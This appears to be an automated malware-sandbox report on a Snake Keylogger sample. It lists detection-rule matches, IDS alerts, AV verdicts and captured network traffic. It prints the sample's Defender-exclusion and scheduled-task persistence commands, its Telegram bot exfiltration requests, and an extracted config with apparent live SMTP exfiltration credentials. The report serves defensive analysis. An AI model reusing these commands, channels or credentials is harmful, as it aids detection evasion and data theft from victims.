1.2.ckHregxJIq.exe.414e258.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb50c0:$a1: get_encryptedPassword 0xf80e0:$a1: get_encryptedPassword 0x13af00:$a1: get_encryptedPassword 0xb5648:$a2: get_encryptedUsername 0xf8668:$a2: get_encryptedUsername 0x13b488:$a2: get_encryptedUsername 0xb4d33:$a3: get_timePasswordChanged 0xf7d53:$a3: get_timePasswordChanged 0x13ab73:$a3: get_timePasswordChanged 0xb4e4a:$a4: get_passwordField 0xf7e6a:$a4: get_passwordField 0x13ac8a:$a4: get_passwordField 0xb50d6:$a5: set_encryptedPassword 0xf80f6:$a5: set_encryptedPassword 0x13af16:$a5: set_encryptedPassword 0xb7df2:$a6: get_passwords 0xfae12:$a6: get_passwords 0x13dc32:$a6: get_passwords 0xb8186:$a7: get_logins 0xfb1a6:$a7: get_logins 0x13dfc6:$a7: get_logins
1.2.ckHregxJIq.exe.414e258.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6484:$s1: UnHook 0xf94a4:$s1: UnHook 0x13c2c4:$s1: UnHook 0xb648b:$s2: SetHook 0xf94ab:$s2: SetHook 0x13c2cb:$s2: SetHook 0xb6493:$s3: CallNextHook 0xf94b3:$s3: CallNextHook 0x13c2d3:$s3: CallNextHook 0xb64a0:$s4: _hook 0xf94c0:$s4: _hook 0x13c2e0:$s4: _hook
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", ProcessId: 7512, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe, ParentImage: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe, ParentProcessId: 1292, ParentProcessName: aFAsiNcQRJEVeL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", ProcessId: 5492, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", ProcessId: 5324, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", ProcessId: 7512, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", ProcessId: 5324, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:37:26.094763+0100	2803305	3	Unknown Traffic	192.168.2.5	49695	104.21.96.1	443	TCP
2025-03-07T15:37:30.962378+0100	2803305	3	Unknown Traffic	192.168.2.5	49699	104.21.96.1	443	TCP
2025-03-07T15:37:31.392538+0100	2803305	3	Unknown Traffic	192.168.2.5	49700	104.21.96.1	443	TCP
2025-03-07T15:37:34.972982+0100	2803305	3	Unknown Traffic	192.168.2.5	49703	104.21.96.1	443	TCP
2025-03-07T15:37:42.318533+0100	2803305	3	Unknown Traffic	192.168.2.5	49713	104.21.96.1	443	TCP
2025-03-07T15:37:49.811479+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:37:18.925141+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	132.226.247.73	80	TCP
2025-03-07T15:37:22.425163+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49693	132.226.247.73	80	TCP
2025-03-07T15:37:23.612670+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49696	132.226.247.73	80	TCP
2025-03-07T15:37:27.018898+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49698	132.226.247.73	80	TCP
2025-03-07T15:37:27.034530+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49696	132.226.247.73	80	TCP
2025-03-07T15:37:32.315819+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:37:57.371515+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49728	149.154.167.220	443	TCP
2025-03-07T15:38:00.128154+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49729	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ckHregxJIq.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe

Avira: detection malicious, Label: TR/AD.SnakeStealer.twncj

Found malware configuration

Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587"}
Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Virustotal: Detection: 70%			Perma Link

Multi AV Scanner detection for submitted file

Source: ckHregxJIq.exe	ReversingLabs: Detection: 81%
Source: ckHregxJIq.exe	Virustotal: Detection: 70%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor: report3log@cybertechllc.top
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor: 7213575aceACE@
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor: mail.cybertechllc.top
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor: report3@cybertechllc.top
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor: 587
Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: ckHregxJIq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49694 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49697 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2

Source: ckHregxJIq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 4x nop then jmp 02F2F8E9h	14_2_02F2F630
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Code function: 4x nop then jmp 02F2FD41h	14_2_02F2FA88
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 4x nop then jmp 015EF8E9h	19_2_015EF631
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Code function: 4x nop then jmp 015EFD41h	19_2_015EFA88

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49728 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49729 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:45:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:28:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49698 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49702 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49696 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49703 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49700 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49699 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49695 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49694 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49697 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:45:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:28:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
